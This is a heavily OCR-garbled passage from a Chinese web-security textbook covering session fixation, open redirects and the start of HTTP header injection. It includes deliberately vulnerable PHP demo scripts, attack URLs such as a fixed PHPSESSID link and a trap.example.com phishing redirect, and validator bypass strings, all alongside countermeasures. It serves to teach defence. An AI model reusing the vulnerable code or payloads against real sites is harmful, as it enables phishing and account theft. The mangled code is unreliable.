echo htmlspecialchars ($name, ENT COMPAT, 'UTF-8'); ?>"><br> 
邮箱 地 址 :<input name="mail" value="<?php 
echo htmlspecialchars ($mail, ENT COMPAT, 'UTF-8'); ?>"><br> 
<input type="submit" value=" 确认 "> 

















</form> 
</body> 
</html> 





代码 清单 ”/463/46-021.php 





<?php 
session start(); 
Sname = $ SESSION['name'] = $ POSTI['name']; 
$mail = $ SESSION['mail'] = $ POST['mail']; 
?> 
<head><title> 确认 个 人 信息 </title></head> 
<body> 
<form action="46-022.php" method="POST"> 





姓名 :<?php echo htmlspecialchars ($name, ENT COMPAT, 'UTF-8'); ?><br> 


邮箱 地 址 :<?php echo htmlspecialchars ($mail, ENT COMPAT, 'UTF-8'); 
<input type="submit" value=" 注册 "><br> 

<a href="46-020.php"> 返回 </a> 

</form> 

</body> 

</html> 

















?><br> 





代码 清单 ”、/463/46-022.php 








<?php 
session start(); 
Sname = $ SESSION['name']; 
smail = $ SESSION['mail']; 
2 
<head><title> 注册 个 人 信息 </title></head> 
<body> 
已 注册 <br> 














姓名 :<?php echo htmlspecialchars ($name, ENT COMPAT, 'UTF-8'); ?><br> 
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邮箱 地 址 :<?php echo htmlspecialchars ($mail, ENT COMPAT, 
</body> 
</htmls 


I'UTF-8'); ?><br> 





正常 情况 下 的 页 面 跳 转 如 下 。 
图 4-57 页 面 跳 转 


























息 填 号 个 人 信息 - Windows Internet Explorer 己 [ 回 | 器 
口 - | 回 httpi//examplejp/463/46-020.php “|#+| x | sing DP” 
窜 收 天 | 臣 证 S 个 人 信息 [| ;ITRo- 
姓名 德 丸 


邮箱 toku@example jp 








J 确认 按钮 
















































































国 ry 
辣 砚 个 人 信息 - Windows Intemet Explorer 己 [ 画 | 这 
GO 口 - [@ http://examplejp/463/46-021.php ~ ||X|| eng py 
闪 收 天 | 态 克 A 个 人 信息 ; IR(O)™ 
姓名 ， 德 丸 
邮箱 : toku@example jp 

注册 
返回 

时 — 了 

注册 按钮 

[略语 AR-WndoweERAEERO | 

GO- @] htpy/examplejp/463/46-022.php ~ [>| x || sing pr 
亦 收 茂 赤 “| 镍 注册 个 人 信息 ; IR(O)™ 
注册 成 功 
姓名 , 德 丸 


邮箱 :toku@example ip 

















接 下 来 我 们 就 尝试 对 此 应 用 实施 攻击 。 诱 导 用 户 使 用 以 下 URL 访问 应 用 并 使 其 输入 个 人 
信息 。 





http://example.jp/463/46-020.php?PHPSESSID=ABC 

















受害 用 户 输入 自己 的 个 人 信息 ， 如 下 图 所 示 。 


~ 图 4-58 受害 用 户 输入 个 人 信息 





























[@ http://examplejp/463/46-020.php?PHPSESSID=ABC - Windows Internet Explorer (lel 
GO- 加 http://examplejp/463/46-020.php?PHPSESSID=ABC ~| 字 | X 名 Bing 六 
痪 收藏 夫 | 条 http://examplejp/463/46-020.php?PHPSESSI. | | 工 RO ~ 











姓名 佐藤 
邮箱 sato@examplejp 1 
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而 在 另 一 边 ， 攻 击 者 会 定期 监视 刚才 的 URL 页 面 。 当 用 户 输入 个 人 信息 后 ， 如 下 图 所 示 ， 
攻击 者 的 浏 un EE 显示 用 户 的 个 人 信息 。 


图 4-59 ”受害 用 户 的 个 人 信息 显示 在 攻击 者 的 浏览 器 中 











PS [ele| ¥ 
J D examplejp/463/46-020 x NO 人 7 
€ DC Dexamplejp/463/46-020.php?PHPSESSID=ABC »| 三 








姓名 | 住 基 
邮箱 |sato@example jp 
































由 此 可 见 ， 不 需要 认证 的 网 页 如 果 使 用 了 会 话 变量 ， 也 可 能 会 遭受 会 话 固定 攻击 。 
但 是 ， 由 于 此 情况 下 攻击 者 无 法 伪装 成 登录 后 的 用 户 ， 也 无 法 使 用 用 户 的 权限 进行 恶意 操 
作 ， 因 此 攻击 造成 的 影响 就 仅 限 于 用 户 输入 的 信息 被 泄漏 。 


会 话 采 纳 

前 面 所 介绍 的 攻击 流程 中 使 用 了 PHPSESSID=ABC 这 个 会 话 ID。 我 们 发 现 ， 虽 然 ABC 是 
攻击 者 任意 生成 的 ， 但 是 也 能 够 使 攻击 得 到 成 功 。 这 是 因为 能 够 接受 来 源 不 明 的 会 话 ID 是 PHP 
的 特性 之 一 。 而 此 特性 就 被 称 为 会 话 采纳 (Session Adoption )。 除 了 PHP，ASPNET 中 也 存在 会 
话 采纳 的 特征 。 而 PHP 和 ASP.NET 以 外 的 中 间 件 ， 如 Tomcat 等 则 不 存在 会 话 采 纳 ， 这 种 情况 

， 随 意 生 成 的 会 话 ID 就 会 被 忽略 。 

在 对 不 存在 会 话 采纳 的 中 间 件 上 运行 的 应 用 程序 发 动 攻击 时 ， 攻 击 者 会 先 浏览 攻 击 目标 应 
用 ， 取 得 有 效 的 会 话 ID ， 然 后 再 利用 此 会 话 ID 布置 恶意 网 站 。 

由 此 可 见 ， 开 发 工具 中 若 存 在 会 话 采 纳 就 能 减少 会 话 固 定 攻击 的 步骤 ， 然 而 ， 即 便 不 存在 会 
话 采纳 问题 ， 会 话 固定 攻击 也 不 可 能 被 完全 杜绝 。 


令 仅 在 Cookie 中 保存 会 话 ID 的 网 站 固定 会 话 ID 

之 前 介绍 的 攻击 示例 中 ， 我 们 使 用 的 都 是 能 够 将 会 话 ID 保存 在 URL 中 的 应 用 程序 。 这 是 因 
为 会 话 DD 保存 在 URL 的 情况 下 攻击 起 来 比较 容易 。 然 而 ， 仅 将 会 话 ID 保存 在 Cookie 时 ， 会 话 
ID 还 是 有 可 能 会 被 固定 化 。 

通常 情况 下 ， 从 外 部 设置 Cookie 的 会 话 ID 是 行 不 通 的 ， 但 是 ， 如 果 浏 览 吉 或 Web 应 用 中 
存在 安全 隐患 就 男 当 别论 了 。 比 如 ， 以 下 安全 隐患 就 有 可 能 造成 Cookie 被 第 三 方 设置 。 


Cookie Monster Bug( 浏览 器 的 安全 隐患 ， 参 考 3.1 节 ) 
跨 站 脚本 漏洞 (参考 4.3 节 ) 
HTTP 消息 头 注入 漏洞 (参考 4.7.2 ) 


会 话 固定 攻击 的 影响 
一 旦 会 话 固定 攻击 取得 成 功 ， 由 于 中 招 的 用 户 (前 例 中 为 tanaka ) 已 处 于 登录 状态 ,攻击 者 
能 够 使 用 该 用 户 的 权限 执行 操作 或 浏览 信息 等 。 





本 
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安全 隐患 的 产生 原因 


固定 会 话 ID 安全 隐患 产生 的 根本 原因 为 外 界 能 够 动 持 会 话 ID。 因 此 ， 彻 底 应 对 就 需要 实施 
以 下 所 有 步骤 。 


不 将 会 话 ID 骨 入 URL 
不 使 用 ( 或 不 让 用 户 使 用 ) 存在 Cookie Monster Bug” 的 浏览 器 
不 使 用 易 发 生 Cookie Monster Bug 的 地 域 型 域名 
消除 跨 站 脚本 漏洞 
消除 HTTP 消息 头 注入 漏洞 
消除 其 他 能 够 导致 Cookie 被 自 改 的 安全 隐患 
但 是 ， 想 要 满足 以 上 所 有 条 目 并 不 简单 。 比 如 Internet Explorer 中 使 用 地 域 型 域名 时 就 存在 
Cookie Monster Bug， 而 微软 似乎 并 没有 打算 修复 该 问题 。 然 而 ，Internet Explorer 又 是 使 用 率 最 
高 的 浏览 句 ， 我 们 不 可 能 强迫 所 有 用 户 将 其 舍弃 。 
因此 ， 目 前 采取 的 普遍 做 法 是 ， 姑 且 人 允许 会 话 ID 被 外 界 挟持 ， 而 将 防范 重点 放 在 防止 会 话 
固定 攻击 造成 会 话 劫持 上 。 
在 认证 成 功 时 更 改 会 话 ID 就 是 一 种 行 之 有 效 的 方法 ， 有 具体 会 在 后 面 详 述 。 
































对 策 
正如 前 面 所 介绍 的 那样 ， 会 话 ID 被 外 界 固定 化 的 手段 多 种 多 样 ， 有 时 还 会 恶意 利用 浏览 锅 
的 Bug (安全 隐患 )， 因 此 ，Web 应 用 中 防范 会 话 固定 攻击 可 以 采取 如 下 策略 。 


认证 后 更 改 会 话 ID 
PHP 中 执行 此 处 理 可 以 使 用 session regenerate id 函数 。 该 函数 的 格式 如 下 。 











格式 清单 ”session_regenerate_id 函数 


boolMsession regenerate oid([lboolSdelete oldDsesslonmn = falsel) 





session regenerate_id 函数 中 有 一 个 可 省 略 的 参数 。 但 由 于 该 参数 会 指定 是 否 将 变更 
前 的 会 话 ID 对 应 的 会 话 信息 删除 ， 所 以 应 始终 将 该 参数 指定 为 rue。 
下 面 为 添加 了 更 改 会 话 ID 这 一 处 理 的 脚本 。 


代码 清单 ”/463/46-011a.php 





<?php 
session start(); 
$iqd = $_POST['id']; // 省 略 登录 处 理 





中 ”Cookie Monster Bug 的 详情 请 参考 3.1 节 的 专栏 。 
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session regenerate id(true); // 更 改 会 话 ID 
$_SESSION['id'] = $id; // 将 用 户 名 保存 至 会 话 
a 
<body> 
<?php echo htmlspecialchars ($id, ENT COMPAT，'UTF-8'); ?> 登录 成 功 <br> 
<a href="46-012.php"> 个 人 信息 </a> 
</body> 











令 无 法 更 改 会 话 ID 时 采用 令 牌 

有 些 Web 应 用 的 开发 语言 或 中 间 件 无 法 在 程序 中 显 式 地 更 改 会 话 ID。 使 用 此 类 开发 工具 
时 ， 可 以 使 用 令 牌 来 防范 会 话 固定 攻击 。 
具体 方法 为 ， 在 登录 时 生成 一 个 随机 数字 符 串 ( 令 牌 )， 并 将 其 同时 保存 至 Cookie 和 会 话 变 
量 中 。 然 后 在 各 页 面 进 行 认证 确认 时 比较 Cookie 和 会 话 变量 中 的 令 牌 值 ， 如 果 两 者 一 致 即 视 为 
已 认证 ， 不 一 致 时 即 视 为 认证 错误 。 

由 于 只 有 在 登录 的 时 候 令 牌 才 能 够 被 传 到 外 界 ， 攻 击 者 无 法 得 知 令 牌 值 ， 因 此 ， 使 用 令 牌 能 
够 成 功 防御 会 话 固定 攻击 。 

此 外 ， 鉴 于 令 牌 需要 确保 在 足够 长 的 时 间 内 无 法 被 预测 ， 生 成 令 牌 时 应 当 使 用 密码 学 级 别 的 
伪 随 机 数 生成 器 。 由 于 PHP 中 没有 提供 能 够 调用 伪 随 机 数 生 成 器 的 函数 ， 因 此 ， 这 里 我 们 使 用 
“改善 PHP 的 会 话 ID 的 随机 性 的 方法 ”中 提 到 的 /dev/urandom 来 进行 说 明 。 

以 下 为 登录 后 生成 令 牌 部 分 的 脚本 。 


代码 清单 ”/463/46-015.php 
































<?php 
// /dev/urandom 通过 /dev/urandom 实现 伪 随 机 数 生 成 器 
function getToken() { 


$s = file get contents('/dev/urandom', false, NULL, 0, 24); 
return base64 encode ($s); 








// 假设 到 这 里 已 经 成 功 通过 认证 








session start(); 

$token = getToken(); // 生成 令 牌 
setcookie('token'，Stoken); // 令 牌 cookie 
$_SESSION['token'] = $token; 














认证 后 的 页 面 通过 以 下 脚本 确认 令 牌 。 


代码 清单 ”/463/46-016.php 








<?php 
session start(); 
// 确认 用 户 名 【 省略 】 
// 确认 令 牌 
$token = $ COOKIE['token']; 
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if (! $token || $token != $ SESSION['token']) { 
die(' 认证 钳 误 1) 7; 





} 


2 


<body> 认证 成 功 </body> 











虽然 示例 中 使 用 的 是 PHP, 但 由 于 PHP 中 提供 了 session regenerate_id 子 数 ， 因 此 并 
非 一 定 要 使 用 令 牌 。 然 而 ， 由 于 令 牌 也 能 够 作为 4.8.2 节 讲 述 的 “Cookie 的 安全 属性 设置 不 完善 ” 
的 对 策 来 使 用 ， 因 此 ， 某 些 情况 下 该 方法 对 PHP 开发 者 来 说 会 非常 有 用 。 详 情 请 参考 4.8 节 。 


令 登 录 前 的 会 话 固定 攻击 的 对 策 
如 果 登 录 前 使 用 了 会 话 变量 ， 要 完全 防范 会 话 固定 攻击 就 非常 困难 。 这 种 情况 下 ， 比 较 现实 
而 有 效 的 对 策 就 是 ， 登 录 前 不 使 用 会 话 管理 机 制 ， 而 使 用 hidden 参数 来 传递 值 。 
像 电子 商务 网 站 的 购物 车 功能 这 种 不 得 不 在 登录 前 使 用 会 话 变量 的 情况 下 ， 可 以 参考 以 下 对 
策 。 但 要 注意 的 是 ， 这 些 都 不 是 根本 性 的 对 策 ， 而 只 能 通过 组 合 使 用 来 提高 防御 能 
不 在 登录 前 的 会 话 变量 内 存储 敏感 信息 
不 使 用 鹃 入 URL 的 会 话 ID 
不 使 用 地 域 型 域名 

















总 结 
本 节 讲 述 了 不 完善 的 会 话 管理 所 导致 的 会 话 劫 持 。 会 话 管理 是 安全 性 的 要 害 之 处 ， 因 此 ,和 若 
出 现 会 话 劫持 的 话 就 会 造成 巨大 影响 。 
会 话 管理 不 完善 的 对 策 如 下 。 
不 自制 会 话 管理 机 制 而 使 用 Web 应 用 开发 工具 的 内 置 功能 
将 会 话 ID 保存 至 Cookie 中 
认证 成 功 时 更 改 会 话 ID 
认证 前 不 在 会 话 变量 中 存储 敏感 信息 
幸运 的 是 ， 本 节 所 介绍 的 安全 隐患 防范 策略 的 实施 场所 少 而 明确 ， 实 施 成 本 并 不 高 。 因 此 ， 
建议 开发 者 们 从 设计 阶段 就 开始 有 计划 地 落实 防范 策略 。 
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4.7 重 定向 相关 的 安全 隐患 

















Web 应 用 中 有 时 会 重 定向 至 外 界 指定 的 URL。— 典 型 案例 为 ， 在 登录 页 面 的 参数 中 指定 URL， 
登录 成 功 后 再 重 定向 至 该 URL。 比 如 使 用 以 下 URL 登录 Google 后 ， 就 会 重 定向 到 continue= 指 
定 的 URL (此 处 为 Gmail ) "。 














https://www.google.com/accounts/ServiceLogin?continue=https://mail.google.com/mail/ 














重 定 向 处 理 时 产生 的 安全 隐患 有 如 下 几 种 ， 而 且 它 们 都 会 招致 被 动 攻 击 。 
自由 重 定向 漏洞 
HTTP 消息 头 注 入 漏洞 


接 下 来 ， 本 节 将 对 以 上 两 种 安全 隐患 进行 详细 说 明 。 








4.7.1 自由 重 定向 漏洞 


概要 

刚才 已 经 提 到 ， 有 些 Web 应 用 中 提供 了 能 够 重 定向 到 参数 指定 的 URL 的 功能 ， 该 重 定向 功 
能 就 被 称 为 重 定 向 句 ( Redirector )。 
其 中 ， 能 够 重 定向 至 任意 域名 的 重 定向 融 叫 作 自 由 重 定向 ( Open Redirect )。 自 由 重 定向 可 能 
会 导致 用 户 在 不 知情 的 情况 下 被 带 到 其 他 域名 的 网 站 ， 从 而 人 遭 到 钓鱼 式 攻 击 ( Phishing )。 


自由 重 定向 示例 


http://example.jp/?continue=http://trap.example.com/ 
通过 以 上 URL 跳 转 至 http://trap.example.com/ 


















































钓鱼 式 攻击 的 常见 手段 为 ， 将 用 户 带 到 伪装 成 著名 网 站 的 恶意 网 站 ,并 诱 使 用 户 输入 个 人 
信息 。 
如 果 用 户 信赖 的 网 站 存在 自由 重 定向 漏洞 ， 用 户 就 可 能 会 在 不 知 不 觉 中 被 诱导 到 恶意 网 站 ， 
却 自 以 为 还 在 浏览 自己 信赖 的 网 站 。 此 时 ， 即 便 是 戒心 很 重 的 用 户 也 会 比较 轻易 地 输入 自己 的 个 
人 信息 等 重要 内 容 。 而 自由 重 定向 漏洞 就 常 被 用 于 此 类 狭 猎 的 钓鱼 式 攻击 。 
另外 ， 如 果 软 件 或 设备 驱动 程序 的 下 载 网 站 存在 自由 重 定向 漏洞 ， 就 有 可 能 被 不 法 分 子 利用 
来 散布 恶意 软件 ( 非法 程序 )。 



































四 写作 本 书 时 已 进行 过 确认 ， 但 将 来 可 能 会 有 所 更 改 。 
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为 了 防范 自由 重 定向 漏洞 ， 应 该 重新 评估 “外界 能 够 指定 重 定 向 目标 URL” 的 功能 是 否 真 
的 不 可 或 缺 ， 并 尽 可 能 将 重 定向 的 目标 固定 。 如 果实 在 不 能 固定 重 定 向 的 目标 ， 就 需要 将 重 定向 
的 目标 限制 在 允许 的 域名 范围 内 。 




















自由 重 定向 漏洞 总 览 






















































































产生 地 点 
能 够 重 定向 至 外 界 指定 的 URL 的 地 方 
-三 影响 范围 
影响 范围 并 非 仅 限于 Web 应 用 中 的 某 个 页 面 ， 通 过 钓鱼 式 攻 击 被 窃取 重要 信息 后 ，Web 应 用 的 
用 户 就 会 遭受 损失 





















































人 影响 类 型 
e 将 用 户 诱导 至 钓鱼 网 站 ， 使 其 输入 重要 信息 
。 冒充 设备 驱动 程序 或 更 新 补丁 来 散布 病毒 


4 ee 


用 户 参 与 程度 
很 大 。 点 击 链接 并 且 输 入 信息 


对 策 概要 
i 

e 固定 重 定向 目标 

e 采用 白 名 单机 制 ， 将 重 定向 目标 限定 在 允许 的 域名 范围 内 




























































































攻击 手段 与 影响 
接 下 来 我 们 就 来 看 一 下 针对 自由 重 定向 漏洞 的 典型 攻击 模式 及 其 影响 。 下 面 是 具备 重 定向 功 
能 的 密码 认证 的 示例 脚本 。 


代码 清单 “/47/47-001.php 




















<?php 
SUrl = @$ GET['UrL'); 
if (! isset ($url)) { 


$url = 'http://example.jp/47/47-003.php'; 
} 
Es 
<html> 
<head><title> 请 登录 </title></head> 
<body> 
<form action="47-002.php" method="POST"> 
名 <input type="text" name="id"><br> 


























密码 <input type="password" name="pwd"><br> 
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<input type="hidden" name="url" 

value="<?php echo htmlspecialchars ($url, ENT COMPAT, 'UTF-8') ?>"> 
<input type="submit" value=" 登录 "> 

</form> 

</body> 

</html> 





代码 清单 ”/47/47-002.php 





<?php 

sid = i188et($ POST["id']) ? $ POST["id"] i "'; 
$Spwd = isset($ POST['pwd']) ? $ POST['pwd'] : ''; 
SUrEl =: Ts8et($ POSTL'UEL]) 2 $ POSTLUEL TY 8 TV 
// 只 要 输入 了 用 户 名 和 密码 就 能 成 功 登 录 
if ($id != '' && Spwd != '') { 

// 重 定向 至 指定 的 URL 

header('Location: ' . $url); 












































exit(); 


} 
// 以 下 为 登录 失败 的 情况 
































2 
<body> 
名 或 密码 错误 
<a href="47-001.php"> 重新 登录 </a> 
</body> 





代码 清单 ”/47/47-003.php 





<html> 
<head><title> 认证 成 功 </title></head> 
<body> 
登录 成 功 
</body> 
</html> 














47-001.php、47-002.php、47-003.php 为 极度 简化 后 的 登录 脚本 。 由 于 仅 用 于 演示 ，47-002.php 
中 没有 检验 用 户 名 和 密码 。 登 录 认 证 成 功 后 会 重 定向 至 POST 参数 url 所 指定 的 URL。 重 定向 
处 理 的 内 容 即 为 输出 Location 消息 头 。 图 4-60 展示 了 页 面 的 跳 转 。 
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4-60” 重 定向 范例 的 页 面 跳 转 








































































































[看 记录 -Windows Internet Bplorer | 
(eX Or" | 7-001L.php?url=http//examplejp/47/47-003.php ~ | | x | sing 只 ~ 
EE | 

用 户 名 user1 
密码 ssee 

47-002.php 

| BE - Windows Internet Explorer 六 
= [@ hp//examplejp/47/47-002.php *[?|x] 回 are p=| 
六 em | 

不 显示 页 面 
a 
电 - 
47-003.php | 重 定向 至 47-003.php 
[ @ Wis - Windows internet Explorer BIEl 员 
GO 口 - | 天 http://examplejp/47/47-003.php "|> | x||5 ang PP | 
[ee ER CE 


登录 成 功 

















正常 情况 下 ， 重 定向 目标 应 该 为 47-003.php。 但 是 ， 如 果 攻 击 者 精心 准备 了 能 路 转 到 恶意 网 


站 的 URL 来 让 用 户 点 击 会 怎样 呢 ? 





url=http://example.jp/47/47-003.php 


吃 p Ar 呈 


字符 串 xxx， 指 定 认 证 后 的 显示 页 






































BOSD 
id=xxx pWd=Xxxx 
url=http:Wexample.jp/47/47-003.php 




















四 


[2 


了 


/ 世 \ 


假设 此 处 恶意 网 站 的 URL 为 http://trap.example.com/47/47-900.php。 以 下 为 47-900.php 的 源 


代码 。 


代码 清单 ”/47/47-900.php 





<html> 


<head><title> 登录 错误 </title></head> 
<body> 


名 或 密码 错误 。 请 再 次 登录 。 





















































<input type="submit" value=" 登录 "> 
</form> 
</body> 
</html> 


<form action="47-901.php" method="POST"> 
名 <input type="text" name="id"><br> 
密码 <input type="password" name="pwd"><br> 





攻击 者 会 给 用 户 发 送 邮 件 或 在 用 户 的 博客 中 发 表 评 论 ， 想 方 设法 地 使 用 户 浏 览 以 下 URL。 








http://example.jp/47/47-001.php?url=http://trap.example.com/47/47-900.php 
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由 于 域名 没有 问题 , 并 且 HTTPS 的 情况 下 证 书 也 没有 出 错 了 了 , 因此 多 数 用 户 都 会 毫 无 防备 地 
输入 用 户 名 和 密码 。 这 时 ， 应 用 程序 在 47-002.php 认证 成 功 后 ， 就 会 跳 转 到 图 4-61 所 示 的 恶意 
网 页 。 


图 4-61 恶意 网 页 


站 
息 登录 错误 - Windows Internet Explorer 已 | 回 | 名 


























痪 由 项 夫 。 | 税 登录 错 用 贺 IAO) ~ 





用 户 名 或 密码 有 误 。 请 重新 输入 。 




















虽然 用 户 输入 的 确实 是 正确 的 用 户 和 名 和 密码 ， 但 看 到 这 个 页 面 后 还 是 不 免 会 产生 疑惑 而 再 次 
输入 。 由 于 用 户 已 经 进入 到 了 恶意 网 站 ， 因 此 ， 点 击 登录 按钮 后 用 户 名 和 密码 就 会 被 发 送 给 恶意 
网 站 ， 而 如 果 随 后 又 能 跳 转 至 正规 页 面 (47-003.php )， 那 么 用 户 就 在 毫 不 知情 的 情况 下 被 窃取 了 
重要 信息 。 


























安全 隐患 的 产生 原因 
自由 重 定向 漏洞 产生 的 原因 有 以 下 两 点 。 
重 定向 的 目标 URL 能 够 由 外 界 指定 
没有 对 重 定向 的 目标 域名 进行 校 验 
以 上 两 点 是 AND 条 件 ， 也 就 是 说 只 有 同时 满足 这 两 点 时 才 会 形成 自由 重 定向 漏洞 ， 因 此 ， 
只 要 使 其 中 一 项 无 法 满足 也 就 消除 了 安全 隐患。 


令 允 许 自由 重 定向 的 情况 

上 面 讲述 的 都 是 自由 重 定向 导致 安全 隐患 的 情况 ， 但 并 非 所 有 的 自由 重 定向 都 会 造成 安全 隐 
患 。 例 如 ， 满 足以 下 两 个 条 件 时 就 不 会 造成 安全 隐患 。 

根据 应 用 的 需求 本 来 就 应 该 跳 转 至 外 部 域名 

用 户 自己 清楚 会 跳 转 至 外 部 域名 

满足 上 述 条 件 的 一 个 重 定向 的 例子 就 是 横幅 广告 。 虽 然 多 数 横幅 广告 都 使 用 了 应 用 内 部 的 重 
定向 功能 , 但 只 要 用 户 能 分 辨 出 自己 点 击 的 是 广告 ,那么 即使 有 自由 重 定向 功能 也 不 会 造成 安全 
隐患 。 















































QD 本 例 中 没有 涉及 HTTPS。 
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对 策 
自由 重 定向 漏洞 的 根本 性 防范 策略 有 下 列 三 项 ， 实 施 时 任 选 其 一 即 可 。 


国定 重 定向 的 目标 URL 
使 用 编号 指定 重 定向 的 目标 URL 
校 验 重 定 向 的 目标 域名 


下 面 我 们 就 来 依次 解说 。 








令 固 定 重 定向 的 目标 URL 
重新 评估 应 用 的 需求 ， 探 讨 是 否 能 够 固定 URL 的 跳 转 去 向 ， 而 不 是 由 外 界 指定 。 只 要 能 够 
固定 重 定向 的 目标 ， 就 能 成 功 根除 自由 重 定向 漏洞 。 


令 使 用 编号 指定 重 定向 的 目标 URL 

由 于 某 些 原因 而 不 得 不 采用 可 变 的 重 定向 目标 时 ， 可 以 采用 “页 面 编 号 ”的 形式 来 指定 目标 
URL。 页 面 编号 和 URL 的 对 应 表 应 该 保存 在 外 界 无 法 访问 的 脚本 源码 或 文件 、 数 据 库 中 。 

使 用 此 方法 后 外 界 就 无 法 任意 指定 域名 ， 因 此 也 就 消除 了 自由 重 定向 漏洞 。 


令 校 验 重 定向 的 目标 域名 
如 果 使 用 编号 来 指定 重 定向 目标 的 方法 也 行 不 通 ， 那 么 就 只 能 通过 校 验 重 定向 目标 来 防止 跳 
转 至 任意 域名 了 。 然 而 ， 由 于 该 校 验 处 理 陷 阱 重重 ， 因 此 推荐 尽量 使 用 上 面 两 种 方法 。 
首先 我 们 来 看 一 个 校 验 URL 的 失败 案例 。 


失败 例 1 















































if (mb ereg('example\.jp', $url)) { 
// 校 验 通过 

















该 例子 虽然 确保 了 URL 中 包含 example.jp， 但 是 还 远 远 不 够 。 比 如 ， 以 下 包含 了 example.jp 
的 URL 就 成 功 通 过 了 验证 ， 并 使 攻击 得 以 成 功 。 


混 过 校 验 的 URL 








http://trap.example.com/example.jp.php 





失败 例 2 





if (mb ereg('*/', $url)) { 
// 校 验 通 过 
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该 例子 确保 了 URL 以 / 开头 。 换 言 之 ， 该 校 验 的 思路 为 ， 如 果 只 人 允许 指定 相对 URL， 就 能 
杜绝 重 定向 至 外 部 域名 。 
但 是 ， 以 下 URL 就 能 够 通过 该 校 验 。 


混 过 校 验 的 URL 






































//trap.example.com/47/47-900.php 








以 // 开头 的 URL 被 称 为 “网 络 路 径 引 用 "”， 这 种 形式 的 URL 指定 主机 名 ( FQDN ) 以 下 的 
内 容 。 也 就 是 说 ,该 校 验 无 法 完全 禁止 跳 转 至 外 部 域名 了。 
失败 例 3 





if (mb ereg(' http://example\.jp/', $url)) { 
// 校 验 通过 














第 3 个 失败 例 的 正则 表达 式 使 用 前 方 一 致 匹配 来 确保 URL 以 http://example.jp 开头 。 但 是 ， 
如 果 仅 进行 该 校 验 的 话 就 有 可 能 会 招致 HTTP 消息 头 注 入 攻击 。 而 通过 HTTP 消息 头 攻击 ， 有 时 
还 能 够 重 定向 至 其 他 域名 ， 因 此 ， 该 方法 也 不 能 完全 杜绝 自由 重 定向 漏洞 。 

关于 HTTP 消息 头 注 入 的 详情 请 参考 下 一 小 节 。 


推荐 写法 

















if (mb etreg('NRAhttps?://example\.jp/[- .!~*\'();\/?:@&=+\$,%#a-zA-20-9] *\z', $url)) { 
// 校 验 通过 











推荐 写法 中 确保 了 URL 以 http://example.jp/ 开头 ,并且 还 保证 了 后 面 仅 包含 能 被 用 于 URL 
( URI ) 的 字符 。 男 外 ， 如 4.2 节 中 讲述 的 一 样 ， 此 处 使 用 了 \A 和 \z 匹配 字符 串 的 开头 和 结 
而 正则 表达 式 https? 则 是 为 了 能 够 同时 匹配 http 和 https。 





























四 虽然 HTTP/1.1 的 规格 RFC2616 中 规定 了 Location 消息 头 中 指定 的 URL (URI) 必须 为 绝对 URL (10.30 项 )， 但 主 
流 浏览 器 都 允许 相对 URL 的 形式 。 
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/人 





专栏 : 警告 页 面 





COLUMN 
在 拍卖 网 站 及 社交 网 站 等 用 户 输入 的 URL 会 以 链接 形式 显示 的 网 站 中 ， 攻 击 者 通常 会 利用 
这 个 特性 将 用 户 诱导 至 钓鱼 网 站 。 

而 为 了 防止 该 攻击 手段 ， 可 以 添加 一 个 叫 作 警告 
名 的 网 站 。 在 警告 页 面 上 提醒 用 户 即将 跳 转 至 外 部 
卖 网 站 的 警告 页 面 。 通 过 显示 该 页 面 让 用 户 提高 警惕 


图 4-62 雅虎 拍卖 网 站 的 警告 页 面 

















页面 





























的 网 页 ， 使 用 户 无 法 直接 跳 转 至 外 部 域 
网 站 ， 以 此 来 防止 钓鱼 式 攻击 。 下 图 为 雅虎 拒 
， 然 后 再 跳 转 至 外 部 网 站 。 
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帮 Yahoo! 才 一 夕 习 > - Windows Internet Explo [Lo 1 © En 
(>) * | http://page4.auctions.yahoo.co.jp/jp/show/bouncer?url=http%3a//www] Lnet/&crumb=RIrk13oMpOW -| 5| 
帘 -WYahoo! 才 一 夕 沁 a 偷 ~ 一 
“YAHOO! 1 一 27a> 
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ahool JAPAN - 才 一 夕 /aw 利 用 登录 - 





声 左 万 页 刀 和 也 又 L 示 5 上 LT AN 吾 UYX2 先 仁 

Yahoo! JAPAN[yahoo.co.jp] Lh 
ID 沪 / 儿 又 一 下 左 要 求 二 召 村 了 上 仆 I 己 注意 《< 龙 

http www met < 


Ne 己 确认 《万 起 1! 


了 久 一 厂 上 15|Yahool 才 一 加 /3 办 村 HE 似 世 艺 、Yahoo! JAPANID 区 从 又 口 一 上 老 资 办 取石 
3 姥 了 办 存在 未 直 。 

吉 、yahoo.c0.jp 以 外 中 了 FL 又 中 信 一 沪 亿 所 客 样 |cYahoo! JAPANID 公 内 又 口 一 雯 
CU I) 大 大 《Id 一切 而 J 未 世 AL。 






















户 L<(HYahool 才 一 少 3/ 安全 计策 研究 所 龙 乙 牙 < 失 LY。 
重 定 向 中 也 能 使 用 警 
转 ， 而 是 应 该 考虑 是 否 铺 

此 外 ， 由 于 警告 页 面 


Ey 






































告 页 面 。 而 即使 是 在 允许 重 定向 至 外 部 网 站 的 情况 下 ， 也 不 建议 直接 跳 
E 插 入 警告 页 面 来 防止 钓鱼 式 攻击 。 

还 能 够 防止 会 话 ID 泄漏 ， 因 此 在 面向 手机 的 应 用 中 也 有 着 广泛 的 应 用 。 
详情 请 参考 7.4 节 。 




































































4.7.2 HTTP 消息 头 注入 


本 节 讲 述 HTTP 消息 头 注 入 。HTTP 消息 头 注 入 漏洞 除了 会 发 生 在 重 定向 处 理 中 , 在 Cookie 
输出 等 所 有 输出 HTTP 响应 头 的 处 理 中 也 都 有 可 能 发 生 


概要 














HTTP 消息 头 注入 漏洞 是 指 在 重 定向 或 生成 Cookie 等 基于 外 部 传人 的 参数 输出 HTTP 响 
头 时 所 产生 的 安全 隐患 。 输 出 响应 消息 头 时 ， 攻 击 者 通过 在 参数 中 插入 换 和 


了 符 ， 就 可 以 在 受害 人 
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的 浏览 器 上 实现 下 列 操作 。 


任意 添加 响应 消息 头 

伪造 响应 消息 体 

而 针对 HTTP 消息 头 注 和 漏洞 实施 的 攻击 就 叫 作 HTTP 消息 头 注 入 攻击 。 

响应 头 中 的 换行 符 有 特殊 意义 ， 如 果 在 输出 过 程 中 没有 对 外 界 指 定 的 换行 符 进 行 处 理 ， 就 会 
导致 HTTP 消息 头 注 入 漏洞 产生 。 

Web 应 用 中 若 存在 HITP 消息 头 注 入 漏洞 ， 就 会 造成 如 下 影响 。 














生成 任意 Cookie 

重 定 向 至 任意 URL 

更 改 页 面 显示 内 容 

执行 任意 JavaScript 而 造成 与 XSS 同样 的 损害 

为 了 防范 HTTP 消息 头 注入 漏洞 ， 建 议 不 要 手动 生成 HTTP 消息 头 的 输出 部 分 ， 而 是 利用 专 
